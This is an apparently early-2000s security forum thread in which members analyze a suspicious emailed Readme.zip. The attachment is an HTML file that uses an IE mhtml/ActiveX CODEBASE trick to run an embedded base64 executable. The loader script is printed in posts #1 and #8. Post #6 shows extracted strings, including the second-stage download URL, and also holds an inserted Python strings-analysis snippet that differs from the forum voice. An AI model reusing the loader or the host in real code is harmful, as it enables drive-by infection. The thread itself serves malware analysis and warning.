Received A Strange File? Thoughts

Thread: Received A Strange File? Thoughts

  1. #1
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743

    Received A Strange File? Thoughts

    Hi Guys,

    Received a strange e-mail tonight..
    Addressed as from Admin..
    Subject: Newsletter
    Attachment: Readme.zip (size 1.2k)
    Message reads:
    Hello , ++und3rtak3rs=email addy-removed++


    New windows bug was detected , details in readme.htm file (attached) !

    This is not spam ! , you get this letter because you are member of www.security.org
    First: Security.ORG is a locksmiths' organisation.. (well, that is what I turned up when I keyed the URL) So why the f are they emailing a Windows bug warning?
    Second: I haven't subscribed to this mob's newsletters.. should I need to learn to pick locks better? (mind, they nearly had me.. glad I checked the website out)
    Third.. why is the message in a ZIP file? esp. when the file is only 1.2k in size?

    Next thought I would get my Offline machine to check the file..
    The contents of the Zip file was "Readme.htm"
    Viewing the contents of the file using the View feature in WinRAR:
    MIME-Version: 1.0
    Content-Location:file:///aaa.exe
    Content-Transfer-Encoding: base64

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
    ----64 or so lines removed--
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    <body bgcolor=black scroll=no><script>
    function f()
    {s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
    document.write('<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
    setTimeout('f()',3000)</script>
    great this wants to run an executable.. and it seems to be in the email?
    am I right... anyone else seen this before?


    Cheers

    BTW.. I will see what happens when executed...

    hmmm.. my security settings prevent the execution of ActiveX controls..hmmm
    perhaps I am glad I am not a locksmith...

    I still wonder why I can't use Norton or McAfee to remove this flu I have..
    "Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  2. #2
    str34m3r
    Guest
    Hey, would you mind posting the zip file for us to pick apart? Call me crazy, but I enjoy doing computer forensics and reverse engineering malware.

  3. #3
    Member
    Join Date
    Sep 2002
    Posts
    77
    What email account did it arrive in? Was it a Hotmail one by any chance? I'm sure you know what they're like.

    By the looks of it somebody's trying to engineer you into running a trojan. That's my best guess. After all, for a bug warning, why would they need to run a message with an .exe? If they were trying to make a good impression and woo the world with their wonderful all-singing, all-dancing warning, wouldn't they do it with JavaScript?

    The whole thing screams out script kiddie, especially the black background and red writing, one who hasn't done their homework properly (security.org(!!)).

    And yes, it does look to be wanting to load it from the .htm file, or at least somewhere on the HDD, in a temp directory (where WinZip would extract the .htm file to when you double-click it; this is what the unescape(path) does, I think).
    "Death is more universal than life; everyone dies but not everyone lives."
    A. Sachs

  4. #4
    I received a somewhat similar file a while back. I received it over IRC and it was called 'mindjail.html'. (IRC-New trojan ?)
    However, the JavaScript in that file was not visible.
    The script is recognized by Norton AntiVirus as 'trojan.sefex'. *
    It is a patched IE bug AFAIK, originally discovered by the people of malware.com (http://www.malware.com/gulp.html if I am correct)
    You could try to decode it by using UUDeview for Windows, but the exe is probably UPXed.
    You can of course try to un-UPX it: http://upx.sourceforge.net
    I would not recommend executing it on a production machine because it is probably a trojan.

    * I think Norton recognizes it because of the script, because when I recreated an HTML file like that with a base64-encoded 'hello world' program it got recognized as that trojan.

    I hope this can be of any help.

    Cheers
    noODle

  5. #5
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743


    Here is the File,

    When it executes it attempts to "Install" the aaa.exe also as mentioned in my other post.. I have a popup that says that the ActiveX Control is unable to run due to the security settings?

    The message was received through my local ISP (my normal email account); Hotmail and Yahoo are reserved for "handing out email addy's on the net"..best spam filter I use..

    Have attached the file

    Cheers

    edit:

    BTW: NAV.. reported nothing.. extracted the HTM file and scanned it separately.. clean..hmm am I jumpy? hmm virii under the bed..(instead of reds under the bed)
    hmm that is where I should be..
    "Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  6. #6
    Unfortunately I have no testbox up at the moment.
    Anyway, I ran BinText on it and here is the output:
    ===================================
    File pos Mem pos ID Text
    ======== ======= == ====

    0000004D 0040004D 0 !This program cannot be run in DOS mode.
    000001A8 004001A8 0 .text
    000001D0 004001D0 0 .rdata
    000001F7 004001F7 0 @.data
    0000066A 0040206A 0 DeleteFileA
    00000678 00402078 0 ExitProcess
    00000686 00402086 0 GetProcAddress
    00000698 00402098 0 LoadLibraryA
    000006A8 004020A8 0 WinExec
    000006B2 004020B2 0 lstrcatA
    000006BE 004020BE 0 lstrcpynA
    000006C8 004020C8 0 kernel32.dll
    00000800 00403000 0 http://64.246.56.74/~caraoke/ksp.exe
    00000825 00403025 0 mshex.exe
    00000847 00403047 0 Download
    ===================================

    The file did not get recognized as a trojan.
    My first guess is that it will try to download the file from the URL above; however, the URL did not exist.
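As an added example (not the poster's BinText run or its real output), here is a small strings-extraction and classification pass of the kind that produces a listing like the one above, run over a constructed byte blob containing the same strings with the real URL swapped for a placeholder. The list of APIs worth a second look and the "downloader" heuristic (URL string plus WinExec) are my own assumptions, not something the binary was confirmed to do.

```python
import re

# Constructed sample standing in for the 1.2k aaa.exe; NOT the real binary from the thread.
SAMPLE_EXE = (
    b"MZ\x90\x00" + b"\x00" * 60 + b"!This program cannot be run in DOS mode.\x00"
    + b".text\x00.rdata\x00@.data\x00"
    + b"DeleteFileA\x00ExitProcess\x00GetProcAddress\x00LoadLibraryA\x00WinExec\x00"
    + b"lstrcatA\x00lstrcpynA\x00kernel32.dll\x00"
    + b"http://example.invalid/ksp.exe\x00mshex.exe\x00Download\x00"  # placeholder URL
)

# Imports whose presence in a tiny binary is worth a second look (assumed list)
RISKY_APIS = {
    "WinExec": "runs a program",
    "DeleteFileA": "deletes a file (self-removal is common in droppers)",
    "LoadLibraryA": "loads DLLs at run time",
    "GetProcAddress": "resolves functions at run time (keeps them out of the import table)",
    "URLDownloadToFileA": "downloads a file from a URL",
}

def extract_strings(data, min_len=4):
    """Return [(file_offset, text)] for printable ASCII runs, BinText/strings style."""
    return [(m.start(), m.group().decode("ascii"))
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def classify_strings(strings):
    """Pull out URLs, risky API names and dropped-file names; give a rough verdict."""
    texts = [s for _, s in strings]
    urls = [s for s in texts if re.match(r"https?://", s)]
    apis = {s: RISKY_APIS[s] for s in texts if s in RISKY_APIS}
    exe_names = [s for s in texts if s.lower().endswith(".exe") and s not in urls]
    verdict = "likely downloader/dropper" if urls and "WinExec" in apis else "inconclusive"
    return {"urls": urls, "risky_apis": apis, "dropped_names": exe_names, "verdict": verdict}
```

The offsets returned match the "File pos" column of a BinText listing, so the output can be compared line by line with what the scanner reports.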

  7. #7
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    Well, I ran a NeoTrace on http://64.246.56.74/~caraoke/ksp.exe and this is what I got:





    Organization:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Registrar Name....: Register.com
    Registrar Whois...: whois.register.com
    Registrar Homepage: http://www.register.com

    Domain Name: EV1.NET

    Created on..............: Thu, Oct 29, 1998
    Expires on..............: Thu, Oct 28, 2010
    Record last updated on..: Wed, Apr 09, 2003

    Administrative Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Technical Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Zone Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Domain servers in listed order:

    NS2.EV1.NET 216.88.77.7
    NS1.EV1.NET 216.88.76.6

    Register your domain name at http://www.register.com
    -----------------------------------------------------------------------
    OrgName: Everyones Internet, Inc.
    OrgID: EVRY
    Address: 2600 Southwest Frwy., Suite 500
    City: Houston
    StateProv: TX
    PostalCode: 77098
    Country: US

    NetRange: 64.246.0.0 - 64.246.63.255
    CIDR: 64.246.0.0/18
    NetName: EVRY-BLK-9
    NetHandle: NET-64-246-0-0-1
    Parent: NET-64-0-0-0-0
    NetType: Direct Allocation
    NameServer: NS1.EV1.NET
    NameServer: NS2.EV1.NET
    Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
    RegDate: 2001-10-05
    Updated: 2003-03-31

    TechHandle: RW172-ARIN
    TechName: Williams, Randy
    TechPhone: +1-713-400-5400
    TechEmail: admin@ev1.net

    OrgTechHandle: RW172-ARIN
    OrgTechName: Williams, Randy
    OrgTechPhone: +1-713-400-5400
    OrgTechEmail: admin@ev1.net

    ARIN WHOIS database, last updated 2003-07-26 19:15
    Enter ? for additional hints on searching ARIN's WHOIS database.
    -------------------------------------------------------------------------
    Name: rs-64-246-56-74.ev1.net
    IP Address: 64.246.56.74
    Location: Houston (29.761N, 95.361W)
    Network: EVRY-BLK-9



    Hope this helps a bit.



  8. #8
    Senior Member
    Join Date
    Dec 2001
    Posts
    134
    Well, here's the HTML source that ends up being run in your browser. It's all relative, though, so I don't know if it would run differently out of the email, or if whoever made it wrote it like that and then forgot to change it when they sent it out...

    <center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:file://C:\suspect-file\readme.htm!file:///aaa.exe"></object>
    Reality is the one who has it wrong, not you

  9. #9
    Pecosian,
    The HTML you pasted will execute the base64-encoded .exe that is in the HTML source (but left out by Und3ertak3r).
    The purpose of files like these is to trick users into opening them. Because they have the .html extension, people don't suspect it. This way you can plant a trojan on a user's box (providing they are using IE and have not patched their machine).
    In one of the previous posts I linked to the original posted exploit finders.

    Edit
    Here is the securityfocus bid.
    http://www.securityfocus.com/bid/6961

    They state, however, that the bug has not been patched, but to the best of my knowledge it has been patched (or at least partly), because the 'self-executing' hello world I created does not run on my fully patched Win2k machine but does run on my unpatched XP.


  10. #10
    rebmeM roineS enilnOitnA steve.milner's Avatar
    Join Date
    Jul 2003
    Posts
    1,018
    Third.. why is the message in a ZIP file? esp. when the file is only 1.2k in size?
    An attempt to get it through the mail server's rules (removing .exe, HTML mail etc.), perhaps.

    Any chance of posting the mail headers (with suitable changes to protect yourself)? Tracking down mail is a hobby of mine.

    Steve.
    IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com
